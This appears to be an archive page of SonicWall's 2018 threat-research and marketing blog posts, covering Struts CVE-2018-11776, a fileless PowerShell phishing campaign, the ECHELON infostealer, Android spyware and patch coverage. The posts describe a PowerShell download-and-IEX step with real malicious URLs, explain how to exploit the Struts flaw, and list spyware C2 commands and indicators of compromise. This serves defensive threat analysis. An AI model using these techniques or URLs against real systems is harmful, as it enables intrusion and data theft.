Botnets Targeting Obsolete Software

/0 Comments/in /by

Overview: This is not a disclosure of a new vulnerability in SonicWall software. Customers with the current SonicWall Global Management System (GMS) 8.2 and above have nothing to worry about. The reported vulnerability relates to an old version of GMS (8.1), which was replaced in December 2016. Customers with GMS 8.1 and earlier releases should patch, per SonicWall guidance, as they are running out-of-support software. Best practice is to deploy a SonicWall next-generation firewall (NGFW) or a web application firewall (WAF) in front of GMS and other web servers to protect against such attacks. Look for global third-party validation on protection effectiveness, such as the 2018 NSS Labs NGFW Group Test. After rigorous testing, SonicWall firewalls earned the NSS Labs coveted ‘Recommended’ rating five times.

On Sept. 9, Palo Alto Networks Unit 42 published a blog post highlighting a developing trend of botnets picking up publicly known CVE exploits and weaponizing them against enterprise infrastructure. This marks a change in the botnet authors’ tactics from targeting consumer-grade routers and IP cameras to searching for higher-profile enterprise targets to harness additional endpoints for DDoS attacks.

The first botnet, Mirai, targeted the Apache Struts vulnerability from early 2017, which affects web servers around the world. On March 6, 2017, SonicWall provided protection against the Apache Struts vulnerability with the Intrusion Prevention Service (IPS) on the NGFW line, rolling out protection to all firewalls with licensed IPS service.

The second botnet highlighted in the Palo Alto Networks post, Gafgyt, picked up the Metasploit code for an XML-RPC vulnerability for an obsolete version of SonicWall GMS (8.1) central management software, which was replaced by GMS 8.2 in December 2016.

The bottom line: the reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Implementing Cybersecurity Best Practices

Current SonicWall GMS users are not at risk. However, there are broader lessons here for the industry and business owners:

  • Take End-of-Life and End-of-Support announcements seriously and update proactively. They become a compliance and security risk for critical systems and compromise an enterprise’s compliance and governance posture.
  • Security best practices dictate that you never expose a web server directly to the internet without a NGFW or WAF deployed in front.
  • A security layer between the internet and critical enterprise infrastructure, like web servers or centralized firewall management, provides the ability to virtually patch zero-day vulnerabilities and exploits while working out a sensible patching strategy. For example, a SonicWall NGFW with Intrusion Prevention or a SonicWall WAF can easily handle this task.

Using Third-Party Validation

The blog post does, however, underscore the rapidly-evolving nature of today’s threat landscape, evidenced by the mixing of malware and exploits to create new malware cocktails, and the need to use the latest and most effective security solutions to protect against them.

When selecting a product to protect your critical infrastructure, go beyond listening to vendor claims and look at globally recognized independent testing, such as the NSS Labs NGFW report, to validate security efficacy. Items that you should consider when selecting a security product for the modern threat landscape:

  1. NSS Labs specifically tests for protection on non-standard ports (not just 80/443, for example) because malware often uses non-standard ports to bypass traffic inspection. Products that lack inspection on non-standard ports are blind to many malware attacks, and are easily fooled into missing dangerous traffic and allowing malware and exploits to sail right through.

2018 NSS Labs NGFW Group Test Report — Evasion Resistance

2018 NSS Labs Next Generation Firewall Security Value MapTM (SVM)

  1. Evaluate your NGFW on security efficacy, and how it deals with malware cocktails, such as the recently exposed Intel-based, processor-level vulnerabilities like Spectre, Meltdown and Foreshadow.
  • SonicWall patented and patent-pending Real-Time Deep Memory Inspection (RTDMITM) technology is proven to catch chip/processor attacks through its unique approach to real-time memory inspection.
  • SonicWall RTDMI protection can also be applied to mitigate malicious PDFs, Microsoft Office documents and executables. The focus on PDF and Office document protection is especially important. Attacks are shifting into this delivery mechanism as browsers clamped down on Flash and Java content, drying up a fertile area of exploit and malware delivery. For example, RTDMI discovered more than 12,300 never-before-seen attack variants in the first half of 2018 alone.
  • The SonicWall Capture Client endpoint suite plugs into the RTDMI engine to offer the same protection for users that are outside a protected network.

 

The Bottom Line

The reported botnet attack is misguided and presents no threat to SonicWall GMS in production since December 2016.

Microsoft Security Bulletin Coverage for September 2018

/in /by

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of September 2018. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2018-0965 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8269 OData Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8271 Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8315 Microsoft Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8331 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8332 Win32k Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8335 Windows SMB Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8336 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8337 Windows Subsystem for Linux Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8354 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8366 Microsoft Edge Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8367 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13598 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 3
CVE-2018-8391 Scripting Engine Memory Corruption Vulnerability
IPS 13599 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 4
CVE-2018-8392 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8393 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8409 ASP.NET Core Denial of Service
There are no known exploits in the wild.
CVE-2018-8410 Windows Registry Elevation of Privilege Vulnerability
ASPY 5251 : Malformed-File exe.MP.36
CVE-2018-8419 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8420 MS XML Remote Code Execution Vulnerability
IPS  13600 : MS XML Remote Code Execution Vulnerability (SEP 18)
CVE-2018-8421 .NET Framework Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8424 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8425 Microsoft Edge Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2018-8426 Microsoft Office SharePoint XSS Vulnerability
There are no known exploits in the wild.
CVE-2018-8428 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8429 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8430 Word PDF Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8431 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8433 Microsoft Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8434 Windows Hyper-V Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8435 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8436 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8437 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8438 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8439 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8440 Windows ALPC Elevation of Privilege Vulnerability
GAV 2809 : Injector.PC
CVE-2018-8441 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8442 Windows Kernel Information Disclosure Vulnerability
SPY 5252 : Malformed-File exe.MP.37
CVE-2018-8443 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8444 Windows SMB Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8445 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8446
There are no known exploits in the wild.
CVE-2018-8447 Internet Explorer Memory Corruption Vulnerability
IPS 13601 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8449 Device Guard Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8452 Scripting Engine Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8455 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8456 Scripting Engine Memory Corruption Vulnerability
IPS 13602 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 5
CVE-2018-8457 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8459 Scripting Engine Memory Corruption Vulnerability
IPS 13603 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 6
CVE-2018-8461 Internet Explorer Memory Corruption Vulnerability
IPS 13604 : Internet Explorer Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8462 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8463 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8464 Microsoft Edge PDF Remote Code Execution Vulnerability
ASPY 5244 : Malformed-File pdf.MP.320
CVE-2018-8465 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8466 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13594 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 1
CVE-2018-8467 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13595 : Chakra Scripting Engine Memory Corruption Vulnerability (SEP 18) 2
CVE-2018-8468 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8469 Microsoft Edge Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8470 Internet Explorer Security Feature Bypass Vulnerability
IPS 13597 : Internet Explorer Security Feature Bypass Vulnerability (SEP 18)
CVE-2018-8474 Lync for Mac 2011 Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8475 Windows Remote Code Execution Vulnerability
ASPY 5253 : Malformed-File tif.MP.23
CVE-2018-8479 Azure IoT SDK Spoofing Vulnerability
There are no known exploits in the wild.

New Phishing Campaign Leverages Fileless PowerShell execution using LNK

/in /by

SonicWall has recently spotted a new phishing email campaign spreading actively in the last few days. Malicious email, disguised as a legitimate invoice payment or FedEx receipt, delivers a RAR attachment to the targeted users. Upon extraction of the RAR File, user would see a LNK file that looks like a legit document. LNK file then remotely executes a fileless PowerShell script to download an initial payload. This initial payload then brings down multiple payloads, runs shell code and connects to a command and control (C&C) server, which allows the remote attacker access to the compromised computer

 

Figure 1: Multi stage attack leveraging LNK files

 

Phishing Email Campaign: 

Phishing email is the most popular tactic for tricking users into clicking malicious content It is also determined to be the initial infection vector for most compromises. Attackers trick email recipients into clicking on an attachment or URL in order to infect their computer or steal information. In this phishing campaign, Fedex receipt or Invoice payment receipt has been sent out to targeted victims. 

Figure 2: Phishing email used in this campaign

Emails are sent with RAR attachment which when extracted delivers two LNK files.

Figure 3: Link files extracted from RAR attachment

 

LNK file:

LNK is a file extension for a shortcut file used by Microsoft Windows to point to an executable file or an application. LNK files are generally used to create start menu and desktop shortcuts. LNK stands for LiNK.

In this case, LNK files are disguised like a legitimate document by changing the icon using the image resource dll [%SystemRoot%\System32\imageres.dll ] as shown below

Figure 4: LNK file icon has been modified to look like a legit document

 

 Fileless PowerShell Attack:

In this version, LNK file executes PowerShell.exe.

Figure 6: Fileless PowerShell script execution with IEX

 

Fileless malware attack occurs by loading malware into memory without writing to disk. Since file never gets into disk, this goes undetected by file based detection. In the above given PowerShell command,
DownloadString method is used to download the content from a remote location (‘http://dataishwar.in/ju/jjl.ps1’) to a buffer $wcli in memory. In this case, even having rules to block execution of certain extension such as .ps1 wouldn’t work as ‘Invoke EXpression (IEX)’ is used.

The IEX Invoke-Expression cmdlet in PowerShell evaluates or runs a specified string as a command and returns the results of the expression.

Malicious PowerShell Script is copied from the remote location and gets executed from memory. It then downloads more malicious payloads to compromise the user machine.

 

Threat Graph:

Looks like the attacker has hacked into a legitimate site ‘http://dataishwar.in’ & hosted malicious PowerShell scripts and payloads in it.  Based on the samples seen date, it must be active since July.

Figure 7: Threat intelligence graph from VirusTotal

Hash:

  • 77952875afc68bc3f5aebd99019ea9afda995a17dfb75b6d8de1bd24a70790ff

Listed below are other malicious PowerShell scripts hosted in the same website:

  • http://dataishwar.in/mlioc/ortsd.ps
    First Seen: 2018-09-04 09:08:43
  • http://dataishwar.in/yiu/orrd.ps1
    First Seen: 2018-09-02 08:04:18
  • http://dataishwar.in/mlioc/ortsd.ps1
    First Seen: 2018-09-03 08:46:29
  • http://dataishwar.in/cxs/oise.ps1
    First Seen: 2018-09-02 10:39:05

Trend Graph:

SonicWall has observed a spike in detection in the last few days. 

Figure 7: Hits graph

 

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • GAV 7968: Downloader.FBQH
  • IPS 13513: LNK Remote Code Execution (JUN 17) 1
  • IPS 13514: LNK Remote Code Execution (JUN 17) 2

Cyber Security News & Trends – 09-07-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Cybersecurity and the future of work: How much can we predict? – Silicon Republic (Ireland)

  • SonicWall CEO Bill Conner, talking to Silicon Republic, shares his thoughts on battling the growth areas of cybercrime over the coming years.

US Indicts North Korean Over Sony, Bank and WannaCry Attacks – Infosecurity magazine

  • The U.S. Justice Department has formally charged a hacker in connection with cybercrimes that they are directly connecting to the North Korean government. SonicWall’s Bill Conner is featured as a security expert on the issue.

Cyber Security News

British Airways boss apologises for ‘malicious’ data breach – BBC

  • A week after the Air Canada security leak another major security breach in an Airline, this time British Airways, has been dominating news headlines. Names, email address and credit card information from over 380,000 transactions have been compromised.

Nope, the NSA isn’t sitting in front of a supercomputer hooked up to a terrorist’s hard drive – The Register

  • The Register talks about what exactly Government intelligence services want versus what it’s likely they will be able to get in the current digital climate.

The Case for a National Cybersecurity Agency – Politico

  • Gen. David Petraeus argues in Politico that national cybersecurity is in need of a complete overhaul with the creation of an independent National Cybersecurity Agency that reports directly to the President.

FIN6 returns to attack retailer point of sale systems in US, Europe – ZDNet

  • Point of Sale (POS) malware is really gathering steam. ZDNet have a report on a new campaign by a cybercriminal group called FIN6 who were previously known for selling credit card numbers on the Dark Web.

More U.S. Cities Brace for ‘Inevitable’ Hackers – The Wall Street Journal

  • After the city of Atlanta paid millions of dollars to ransomware attackers this year other U.S. Cities are considering their options on how to handle cyberattacks.

Obama-Themed Ransomware Also Mines for Monero – BankInfoSecurity

  • They’re calling it Barack Obama’s Everlasting Blue Blackmail Virus and it doubles as a cryptocurrency miner on top of being ransomware.

In Case You Missed It

Infographic: Ransomware’s Devastating Impact on Real-World Businesses

/0 Comments/in /by

Still relatively new to the cyber threat landscape, ransomware continues to be one of the high-profile malware types that grab headlines. It’s one part Hollywood-style drama mixed with the “mystery” of cryptocurrencies and the seemingly personal nature of ransomware attacks.

But it’s not hyperbole. Ransomware remains one of the most malicious cyberattacks that can cripple a business. SonicWall’s new infographic highlights composite data that demonstrates how ransomware impacts businesses’ ability to operate.

So, how do you prevent your organization from being severely disrupted by ransomware? The best approach is to use multiple layers that deliver automated, real-time breach detection and prevention. While this isn’t an exhaustive list of all security options, these cornerstone tactics will mitigate most of today’s most malicious cyberattacks, including ransomware.

How to Block Ransomware

Businesses have no choice but to proactively mitigate ransomware attacks. But is there a proven approach that can cost-effectively scale across networks and endpoints? Four key security capabilities make full ransomware protection possible.

  1. Next-Generation Firewall

    Detect and prevent cyberattacks with power, speed and precision.
    Next-generation firewalls (NGFW) are one of your first lines of defense against hackers, cybercriminals and threat actors.

    For example, SonicWall firewalls deliver real-time, cloud-based threat prevention, while augmenting the security from on-box deep packet inspection of SSL traffic (DPI-SSL). And all new SonicWall firewalls integrate with our award-winning network sandbox for advanced threat protection.

  2. Network Sandbox

    Identify and stop unknown attacks in real time.
    A network sandbox is an isolated environment on the firewallthat runs files to monitor their behavior. SonicWall Capture Advanced Threat Protection (ATP) is a multi-engine sandbox service that holds suspicious files at the gateway until a verdict can be achieved.

    Capture ATP also features Real-Time Deep Memory InspectionTM (RTDMI). RTDMI is a memory-based malware analysis engine that catches more malware, and faster, than behavior-based sandboxing methods. It also delivers a lower false-positive rate to improve security and the end-user experience.

  3. Email Security

    Filter email-borne attacks before they hit your network.
    Secure email solutions deliver comprehensive inbound and outbound protection from advanced cyberattacks, including ransomware, phishing, business email compromise (BEC), spoofing, spam and viruses. Proven solutions will be available in on-premise email security appliances and hosted secure email.

    SonicWall Email Security also integrates with Capture ATP to protect email from advanced threats, such as ransomware and zero-day malware.

  4. Advanced Endpoint Client Security

    Block ransomware before it compromises user devices.
    Traditional antivirus (AV) has been trusted for years to protect computers. This was a sound approach when the total number of signatures required numbered in the hundreds of thousands. Today, millions of new forms of malware are discovered each month.

    To protect endpoints from this endless onslaught of malware attacks, SonicWall recommends using a next-generation antivirus (NGAV) solution that can monitor the behavior of a system to look for malicious activities, such as the unauthorized encryption of your files.

    For example, SonicWall Capture Client delivers advanced malware protection and additional security capabilities for SonicWall firewall

Ransomware remains one of the most damaging cyberattacks to businesses. Follow these four ransomware protection best practices to help ensure ransomware does not impact your ability to operate.

4 Ways to Protect Your Virtualized Infrastructure

/0 Comments/in /by

Adopting a virtualized infrastructure is well established as a cost- and space-savings model, but there are additional benefits as well. Whether you are using virtual servers deployed in the cloud or on-premises, there are proven best practices to help you maintain the security posture that operate and protect virtual environments.

While physical appliances remain as powerful workforces, they sometimes require certain network traffic configurations to ensure they can properly protect and integrate with virtual environments

Virtual firewalls, like the SonicWall NSv, are the No. 1 type of virtual appliance being deployed across environments. Securing an environment requires looking at all types of access and uses, such as remote access, communications and management.

SonicWall network security solutions operate and protect virtual environments in four categories:

  • Security: Network Security Virtual Firewall protects virtual environments at an intra-VLAN level.
  • Email: Email Security solution protects organizations against spam, viruses, phishing, ransomware and malware that enter through email. The solution can integrate seamlessly with Microsoft Office 365 and other on-premise and cloud email providers.
  • Remote Access: Secure Mobile Access provides anytime, anywhere access for any device to securely access an organization’s internal resources while the Web Application Firewall gives organizations the necessary controls around their forward-facing offerings.
  • Management: NSv deployments may be centrally managed using the on-premise SonicWall Global Management System (GMS) and the SonicWall Capture Security Center, an open, scalable cloud security management, monitoring, reporting and analytics software delivered as a cost-effective service offering. Capture Security Center gives the ultimate in visibility, agility and capacity to govern the entire SonicWall virtual and physical firewall ecosystem with greater clarity, precision, and speed — all from a single pane of glass.

SonicWall works diligently to ensure customers have access to best-in-class professional services delivered by Authorized Services Partners. These security solutions are optimized within virtual environments.

As Infrastructure as a Service (Iaas) offerings and cloud-based providers continue to grow, implementing trusted SonicWall platforms to protect, secure and manage your environment will allow you to grow and be more mobile through SonicWall’s virtualized product offerings.

Request a demo or trial of these products from your local partner or reach out to the Partner Enabled Services team to help you secure your virtualized environment through SonicWall Partner Enabled Services.

ECHELON infostealer spotted in the wild.

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of ECHELON [ECHELON.A] actively spreading in the wild.

The Malware gathers confidential information from the computer such as login details, passwords and sends it to its own C&C Server.

Contents of the ECHELON Malware

Infection Cycle:

The Malware adds the following file to the system:

  • Malware.exe
    • %Userprofile/Application Data\Quasar\Client.exe

The Malware adds the following keys to the Windows registry to ensure persistence upon reboot:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Quasar Client Startup
    • %Userprofile/Application Data\Quasar\Client.exe

Once the computer is compromised, the Malware copies its own executable into %Userprofile% folder and runs the following commands:

A user’s data can be very valuable for an attacker, thereby more data translates to more profit. The main goal of this malware is to get as much user data as possible.

The malware performs key logging and steals clipboard data from target and saves in following file with its own encryption, here is an example:

Here is an example of encrypted file:

Here is an example of memory snapshot:

 

Command and Control (C&C) Traffic

ECHELON.A performs C&C communication over port 4782. The malware sends a victim’s system information to its own C&C server via following format, here are some examples:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: ECHELON.A (Trojan)

Attackers actively exploiting Apache Struts Vulnerability

/in /by
An OGNL vulnerability (CVE-2018-11776) has been discovered in Apache Struts 2. This is due to incorrect evaluation of the namespace component of a URL as an OGNL expression. This is exposed on servers running Struts under certain configurations.
This can be exploited by sending a specially crafted request to the target server. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the server.

What is Apache Struts?

Apache Struts is a free open source Model-View-Controller (MVC) framework for building Java-based web applications. It is extensible with plugins, shipped with plugins to support REST, AJAX and JSON.

What is MVC Framework?

MVC framework is a software design pattern to separate the application logic from the user interface and the control between the user interface and the application logic. MVC removes the dependencies between these major components, allowing for efficient code reuse without modification.
  • Model represents data.
  • View displays model data & sends user actions to controller.
  • Controller interprets user input and converts it to commands for the Model\ View.

How to configure Struts?:

When you click on a hyperlink or submit an HTML form in a Struts 2 web-application, the input is collected by the Controller which is sent to a Java class called Actions. After the Action is executed, a result selects a resource to render the response. The resource is generally a JSP, but it can also be a PDF file, an Excel spreadsheet, or a Java applet window.

 

Struts.xml file contains the below configuration information to couple the action, view & controller.
<struts> is the root tag element, under which multiple packages can be defined. Package allows separation and modularization of the configuration. This is useful in a large project, divided into smaller modules. Each package can have multiple actions. Action creates an action class which will contain the complete business logic and controls the interaction between the user, the model, and the view. A namespace in struts is a group of actions. It allows two actions with the same name but in different namespaces to have different behavior.

 

Fig 1: A simple struts.xml without namespace

 

Fig 2: A simple struts.xml with namespace

 

Actions are accessed using Request-URIs as below:

http://<host:port>/<path>/<namespace>/<action-name>            <—– URI with namespace
http://<host:port>/<path>/<action-name>                                        <—– URI without namespace

 

Is it Vulnerable?:

When the following two conditions are true, its likely that struts 2 web application is vulnerable
  1. Flag alwaysSelectFullNamespace is set to true in the Struts configuration. Note that this is set to True if your application uses the popular Struts Convention plugin.
  2. Application uses actions that are configured without specifying a namespace, or with a wildcard namespace (e.g. “/*”). This applies to actions and namespaces specified in the Struts configuration file, but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin.
If struts can’t find any namespace for the given action, it will take a user-specified namespace and evaluates it as an OGNL expression, allowing the attacker to perform remote code execution on the server.

How to exploit?

OGNL is the exploit payload here.  OGNL (Object-Graph Navigation Language) is an open-source Expression Language (EL) for Java, which, while using simpler expressions than the full range of those supported by the Java language, allows getting and setting properties, and execution of methods of Java classes.

Fig 3: snippet from POC code

 

Find below the payload after URL encoding
Fig 4: URL encoded payload

 

Strut2 web applications can be exploited by sending a crafted request like shown below. Vulnerable web applications misinterpret OGNL for namespace & execute it without any evaluation.
Fig 5: URL with the injected payload
Malicious payload passed in the above URI gets executed and the output is sent to the attacker. Attacker can even get a reverse shell to the target server by using this exploit.

Trend  Chart:

SonicWall has observed a huge spike in detection in the last few days. Some of our Apache OGNL signatures has provided protection to our customers even before public disclosure has been made.

Fig 6: Hits observed in the last 30 days

Security Patch:

Struts 2 has a history of critical security bugs, many tied to its use of open source expression language (OGNL) technology; some of them can lead to arbitrary code execution. It was reported that failure by Equifax to address a Struts 2 vulnerability was later exploited in a major data breach.
SonicWall recommends our customers to immediately upgrade to Apache struts version 2.5.17 or 2.3.35

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS 9955: Apache Struts OGNL Wildcard Remote Code Execution 1
  • IPS 8479: Apache Struts OGNL Wildcard Remote Code Execution 2
  • IPS 13574: Apache Struts OGNL Wildcard Remote Code Execution 3
  • IPS 13575: Apache Struts OGNL Wildcard Remote Code Execution 4
  • IPS 13576: Apache Struts OGNL Wildcard Remote Code Execution 5
  • WAF 1681: EXEC Statement (Possible SQL Injection)
  • WAF 9011: System Command Injection Variant 1
  • WAF 9010: System Command Access

Cyber Security News & Trends – 08-31-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Air Canada Presses Reset After App Security Snafu – Infosecurity Magazine

  • SonicWall CEO Bill Conner talks to Infosecurity Magazine about the wider implications of the Air Canada app data breach.

T-Mobile, Sprint both hit by Security Breaches ahead of Merger – MSSP Alert

  • In an article detailing the recent T-Mobile and Sprint security breaches ahead of the announced mega-merger, SonicWall’s Bill Conner is featured as a security expert providing perspective on the significance of these security breaches for companies.

Fortnite app for Android let hackers hijack players’ phones, Google warn – The Independent (UK)

  • SonicWall’s VP of Product Management Lawrence Pingree is featured providing commentary to the recent Fortnite vulnerability and the risk organizations face as Fortnite continues to grow.

Cyber Security News

The Untold Story of NotPetya, the Most Devastating Cyberattack in History – Wired

  • In 2017 there was a massive cyberattack that caused billions of dollars of damage worldwide, including almost completely wiping out the systems of a one of the biggest international shipping firms. This is the full story of NotPetya.

Artificial Intelligence Is Now a Pentagon Priority. Will Silicon Valley Help – New York Times

  • The Pentagon and Silicon Valley eye each other up and try and find a common ethical middle ground so they can work together.

ThreatList: Ransomware Attacks Down, Fileless Malware Up in 2018 – Threat Post

  • Cybercrime changes but never goes away.

Give yourselves a pat on the back, top million websites, half of you now use HTTPS – The Register

  • 51.8 percent of the top million websites ranked by Alexa are now using HTTPS, with a little help from Google Chrome and a shaming website.

How Mindfulness Can Help Prevent Hacks, and Four More Cybersecurity Tips – University of Virginia Today

  • This blog might be what you need if all this cybercrime news is getting you down.

In Case You Missed It

A long running Android spyware which targets social apps is still active

/in /by

There are a number of commercial spyware products for Android devices which advertise themselves as “monitoring” apps for children or spouse. Such products have always been in the grey area as they perform questionable activities but at least they are advertise themselves for being what they really are, there is no pretense about their purpose.

The problem arises when a malware starts using similar features and infect a victim’s device tearing it open for an attacker to spy and siphon sensitive data from it. SonicWall Capture Labs Threat Research team observed malware apps with powerful spying capabilities actively spreading in the wild.

INSTALLATION AND INITIAL OBSERVATIONS
The malware uses the old logo of Google Play, this is the first sign that something might be amiss. Further the malware gives a prompt with an input box for email field,  this should be a clear warning sign for a user that something is wrong with this app as the official Google Play app does not show such a prompt:

Upon execution the malware does something that was very unexpected. It runs a series of tests, we have not encountered something like this in recent times:

The email entered by the user is used as an identifier for the infected device and is reported to the attacker:


MAKE ME A SYSTEM APP
The malware then tries to make itself a system application by transferring the apk onto /system/app folder. The benefit of being a system app is that a user cannot remove a system application. This is a good defense mechanism for a malware that allows it to stay on the device even if the victim understands and tries to remove it by conventional means:


INITIATING SPY MODE
During our analysis, the malware started its spy operation by attempting to steal sensitive information from the infected device. We have listed some of the functions based on different categories:

Device related data:

The malware has a component – named MessageSenderTask#work – that steals device related information and sends it to the attacker:

Browser History:

This component – named BrowserHistoryReader#sendBrowserHistory – steals and sends browser history. The collected data is first saved locally in a csv file which is sent at a later stage:

Databases of well known apps:

The malware looks for databases of well known apps, we have listed some of them based on their categories –

Chat/messenger apps – Blackberry BBM, WhatsApp, Line messenger, Skype, Viber

Email clients – Gmail, Hotmail, Outlook

Social media – Twitter, Facebook


WEAK SECURITY
A good coding practice with respect to security that should be followed by a developer – whenever sensitive information is being saved on a device, it should be well protected as someone might misuse this locally saved data. This guideline should be followed by any app developer, fortunately for us the malware author did not follow this.

As stated earlier, the malware registers the infected device with the server using the email we entered. The malware also generates a password for the device and saves it locally. This data can be used to access the dashboard for each infected device, we were able to login using data pertaining to our registered device:

All the spy related functions are present on the left side in the panel, results are shown on the right side:

Panel showing installed apps on our infected device:

It is also important to check if sensitive information is given out by an error message on our web application. When we entered wrong credentials an error message gave out an email address, this can potentially be the admin email address which is used to overlook all the infected devices via the panel:

 

DIGGING FURTHER
The malware we analyzed was communicating with pages on the domain movi333.com. We tried to find more information about this domain and during our search we stumbled across few resources being hosted on this domain:

Premium.pdf

This is essentially an advertisement this spyware, it highlights the different features and how to use each feature after a device is infected:

Steps on how to access the panel and description about all the spy functionalities:

They advice on installing all the apps whose databases are targeted by the spyware, these apps are even hosted on their website if a user wishes to circumvent Google Play:

root.pdf

This document talks about rooting Android devices and points to few tools which can achieve root on a device:

 

Mail system of the domain:

One of the links on this domain led us to its mail system:

This is setup most likely for the users/customers for this spyware.

 

Advertisements, a good and easy to use UI for monitoring the infected devices and a mail system are all indications that this is a well setup operation. Some of the malicious apk’s associated with this campaign are a little old (from 2014) but we found a number of apk’s that are as new as July 2018, coupled with the fact that the domain is still operational indicate that this spyware is most likely still in business.

The best way to stay protected against such spyware is to be vigilant about the apps installed on our devices.

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

GAV: Tarambuka.SPY (Trojan)
GAV: Tarambuka.SPY_2 (Trojan)

 

APPENDIX

MD5 for the indicators of compromise (IOC):

  • 5e24febce239b795d8b65aec28c65616
  • 5607d106f33cd70de1cea968fcf642b4
  • 062afaa5ad37aa3b1da8b85939c05a66
  • 6203348069f7bbb23bdf98596bdd1edf
  • 1aa69ffb952a4a9044332dda432c9d06

The malware creates the following database table on the device – sms_logs –  and saves the following data

  • sms sender
  • sms recipient
  • sms body
  • sms type
  • time when the sms was sent/recieved

We observed the following hardcoded commands in the malware we analyzed:

  • PULLREQUEST_skypelog
  • PULLREQUEST_twitterlog
  • PULLREQUEST_vibermsg
  • PULLREQUEST_whatsapplog
  • PULLREQUEST_gmaillog
  • PULLREQUEST_hotmaillog
  • PULLREQUEST_linemessenger
  • PULLREQUEST_fblog
  • PULLREQUEST_fbmessenger
  • PULLREQUEST_bbmessenger
  • ACAPON/ACAPOFF
  • ACAPDAILYON/ACAPDAILYOFF
  • GPSNOW
  • APPSETTINGS